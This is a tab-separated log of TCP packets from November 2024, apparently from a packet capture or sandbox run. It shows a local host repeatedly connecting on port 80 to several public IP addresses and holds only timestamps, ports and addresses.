Nov 11, 2024 06:51:21.610747099 CET	80	49952	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:21.610763073 CET	80	49952	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:21.610889912 CET	49952	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.616554976 CET	80	49952	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:21.616633892 CET	49952	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.617476940 CET	49952	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.622262001 CET	80	49952	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:26.651235104 CET	49993	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:26.656181097 CET	80	49993	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:26.656249046 CET	49993	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:26.670298100 CET	49993	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:26.675153971 CET	80	49993	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:27.087201118 CET	80	49993	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:27.087291956 CET	49993	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:28.176639080 CET	49993	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:28.181597948 CET	80	49993	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:29.196427107 CET	50014	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:29.201324940 CET	80	50014	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:29.201389074 CET	50014	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:29.218894005 CET	50014	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:29.223754883 CET	80	50014	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:29.637867928 CET	80	50014	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:29.640680075 CET	50014	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:30.722796917 CET	50014	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:30.728307962 CET	80	50014	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.743628025 CET	50024	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:31.748621941 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.755966902 CET	50024	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:31.763895988 CET	50024	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:31.768863916 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.768887043 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.768897057 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.768907070 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.768975973 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.768989086 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.769028902 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.769037962 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:31.769084930 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:32.187835932 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:32.187920094 CET	50024	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:33.269434929 CET	50024	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:33.469551086 CET	80	50024	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:34.290013075 CET	50025	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:34.294856071 CET	80	50025	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:34.294955969 CET	50025	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:34.303607941 CET	50025	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:34.308409929 CET	80	50025	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:34.721667051 CET	80	50025	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:34.727689981 CET	80	50025	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:34.727768898 CET	50025	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:34.728692055 CET	50025	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:51:34.733491898 CET	80	50025	3.33.130.190	192.168.2.4
Nov 11, 2024 06:51:39.931885004 CET	50026	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:39.937112093 CET	80	50026	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:39.937275887 CET	50026	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:39.949613094 CET	50026	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:39.954442978 CET	80	50026	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:40.506824017 CET	80	50026	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:40.553608894 CET	50026	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:40.575570107 CET	80	50026	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:40.577682972 CET	50026	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:41.456993103 CET	50026	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:42.477134943 CET	50027	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:42.481883049 CET	80	50027	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:42.483855009 CET	50027	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:42.494405985 CET	50027	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:42.499187946 CET	80	50027	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:43.098710060 CET	80	50027	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:43.163727045 CET	50027	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:43.190562010 CET	80	50027	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:43.190614939 CET	50027	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:44.004544973 CET	50027	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:45.024005890 CET	50028	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:45.028820992 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.028893948 CET	50028	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:45.043553114 CET	50028	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:45.048492908 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048505068 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048520088 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048532009 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048563957 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048602104 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048625946 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048635006 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.048644066 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.642688036 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.693631887 CET	50028	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:45.733793020 CET	80	50028	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:45.741724014 CET	50028	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:46.553633928 CET	50028	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:47.568862915 CET	50029	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:47.573683977 CET	80	50029	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:47.573764086 CET	50029	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:47.579632044 CET	50029	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:47.584492922 CET	80	50029	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:48.131908894 CET	80	50029	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:48.200156927 CET	80	50029	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:48.200321913 CET	50029	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:48.201081038 CET	50029	80	192.168.2.4	162.0.211.143
Nov 11, 2024 06:51:48.205842972 CET	80	50029	162.0.211.143	192.168.2.4
Nov 11, 2024 06:51:53.270744085 CET	50030	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:53.275696993 CET	80	50030	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:53.275759935 CET	50030	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:53.290297031 CET	50030	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:53.296025991 CET	80	50030	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:54.176104069 CET	80	50030	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:54.176230907 CET	50030	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:54.800755024 CET	50030	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:54.805589914 CET	80	50030	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:55.819735050 CET	50031	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:55.824595928 CET	80	50031	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:55.831679106 CET	50031	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:55.839699030 CET	50031	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:55.844698906 CET	80	50031	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:56.722414970 CET	80	50031	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:56.722469091 CET	50031	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:57.347635984 CET	50031	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:57.352473021 CET	80	50031	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.767637014 CET	50032	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:58.774065018 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.774138927 CET	50032	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:58.794747114 CET	50032	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:51:58.801156998 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.801203012 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.801213026 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.801295042 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.801304102 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.802925110 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.802933931 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.802973032 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:58.802980900 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:59.667072058 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:51:59.667227030 CET	50032	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:00.301760912 CET	50032	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:00.306576014 CET	80	50032	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:01.423695087 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:01.428601980 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:01.428682089 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:01.496186018 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:01.501107931 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332492113 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332515001 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332525969 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332546949 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332556963 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332566977 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332614899 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.332621098 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332632065 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332655907 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332686901 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.332686901 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.332700968 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.332772017 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.337600946 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.436043978 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.577891111 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:02.578197956 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.579673052 CET	50033	80	192.168.2.4	84.32.84.32
Nov 11, 2024 06:52:02.584477901 CET	80	50033	84.32.84.32	192.168.2.4
Nov 11, 2024 06:52:07.667493105 CET	50034	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:07.672353983 CET	80	50034	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:07.672441959 CET	50034	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:07.683842897 CET	50034	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:07.688746929 CET	80	50034	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:08.098769903 CET	80	50034	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:08.098788023 CET	80	50034	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:08.098973036 CET	50034	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:08.104720116 CET	80	50034	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:08.104958057 CET	50034	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:09.191637039 CET	50034	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:10.209407091 CET	50035	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:10.214366913 CET	80	50035	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:10.214524984 CET	50035	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:10.224021912 CET	50035	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:10.228987932 CET	80	50035	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:10.642895937 CET	80	50035	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:10.642955065 CET	80	50035	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:10.643076897 CET	50035	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:10.648969889 CET	80	50035	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:10.651665926 CET	50035	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:11.775603056 CET	50035	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:12.792417049 CET	50036	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:12.797310114 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.797385931 CET	50036	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:12.814795017 CET	50036	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:12.819756985 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819768906 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819801092 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819808960 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819817066 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819952965 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819962025 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819976091 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:12.819984913 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:13.228718996 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:13.228737116 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:13.228786945 CET	50036	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:13.234608889 CET	80	50036	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:13.234659910 CET	50036	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:14.319469929 CET	50036	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.335458994 CET	50037	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.340439081 CET	80	50037	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:15.340513945 CET	50037	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.348037004 CET	50037	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.352904081 CET	80	50037	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:15.765153885 CET	80	50037	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:15.765183926 CET	80	50037	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:15.765419006 CET	50037	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.770883083 CET	80	50037	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:15.773194075 CET	50037	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.773194075 CET	50037	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:52:15.778112888 CET	80	50037	199.59.243.227	192.168.2.4
Nov 11, 2024 06:52:20.805974960 CET	50038	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:20.810787916 CET	80	50038	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:20.810848951 CET	50038	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:20.823921919 CET	50038	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:20.828824997 CET	80	50038	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:21.246514082 CET	80	50038	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:21.246589899 CET	50038	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:22.335354090 CET	50038	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:22.340188026 CET	80	50038	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:23.351809025 CET	50039	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:23.498663902 CET	80	50039	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:23.498744011 CET	50039	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:23.512710094 CET	50039	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:23.517586946 CET	80	50039	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:23.935556889 CET	80	50039	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:23.939248085 CET	50039	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:25.019124985 CET	50039	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:25.023950100 CET	80	50039	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.039354086 CET	50040	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:26.044250965 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.047406912 CET	50040	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:26.059237003 CET	50040	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:26.064153910 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064165115 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064189911 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064199924 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064204931 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064269066 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064277887 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064296007 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.064305067 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.479047060 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:26.479156017 CET	50040	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:27.566016912 CET	50040	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:27.570913076 CET	80	50040	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:28.587161064 CET	50041	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:28.593040943 CET	80	50041	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:28.595302105 CET	50041	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:28.609059095 CET	50041	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:28.613835096 CET	80	50041	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:29.031080008 CET	80	50041	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:29.031799078 CET	80	50041	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:29.031855106 CET	50041	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:29.034984112 CET	50041	80	192.168.2.4	3.33.130.190
Nov 11, 2024 06:52:29.039820910 CET	80	50041	3.33.130.190	192.168.2.4
Nov 11, 2024 06:52:34.425549030 CET	50042	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:34.430401087 CET	80	50042	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:34.431024075 CET	50042	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:34.441724062 CET	50042	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:34.446604967 CET	80	50042	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:35.241013050 CET	80	50042	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:35.284302950 CET	50042	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:35.439809084 CET	80	50042	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:35.439882040 CET	50042	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:35.956887007 CET	50042	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:36.975162983 CET	50043	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:36.980082989 CET	80	50043	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:36.980146885 CET	50043	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:36.990942001 CET	50043	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:36.995732069 CET	80	50043	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:37.791125059 CET	80	50043	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:37.990526915 CET	80	50043	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:37.994817972 CET	50043	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:38.506814957 CET	50043	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:39.521400928 CET	50044	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:39.526318073 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.526391983 CET	50044	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:39.537764072 CET	50044	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:39.542578936 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542660952 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542670012 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542673111 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542676926 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542815924 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542952061 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.542959929 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:39.543011904 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:40.342266083 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:40.396754980 CET	50044	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:40.541429043 CET	80	50044	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:40.548752069 CET	50044	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:41.055897951 CET	50044	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:42.076721907 CET	50045	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:42.081943035 CET	80	50045	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:42.082109928 CET	50045	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:42.092710018 CET	50045	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:42.097465038 CET	80	50045	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:42.892115116 CET	80	50045	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:42.967462063 CET	50045	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:43.091104984 CET	80	50045	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:43.091203928 CET	50045	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:43.092485905 CET	50045	80	192.168.2.4	154.23.184.141
Nov 11, 2024 06:52:43.097239971 CET	80	50045	154.23.184.141	192.168.2.4
Nov 11, 2024 06:52:48.446815014 CET	50046	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:48.451628923 CET	80	50046	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:48.452642918 CET	50046	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:48.464549065 CET	50046	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:48.469326019 CET	80	50046	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:49.262757063 CET	80	50046	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:49.315187931 CET	50046	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:49.461805105 CET	80	50046	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:49.461865902 CET	50046	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:49.972512007 CET	50046	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:50.990470886 CET	50047	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:50.995328903 CET	80	50047	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:50.995389938 CET	50047	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:51.007641077 CET	50047	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:51.012440920 CET	80	50047	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:51.805752039 CET	80	50047	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:51.926517963 CET	50047	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:52.004179955 CET	80	50047	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:52.006781101 CET	50047	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:52.518537998 CET	50047	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:53.536592007 CET	50048	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:53.541488886 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.541584015 CET	50048	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:53.550659895 CET	50048	80	192.168.2.4	38.47.233.52
Nov 11, 2024 06:52:53.555524111 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555533886 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555552959 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555562019 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555573940 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555684090 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555746078 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555754900 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:53.555764914 CET	80	50048	38.47.233.52	192.168.2.4
Nov 11, 2024 06:52:54.352904081 CET	80	50048	38.47.233.52	192.168.2.4
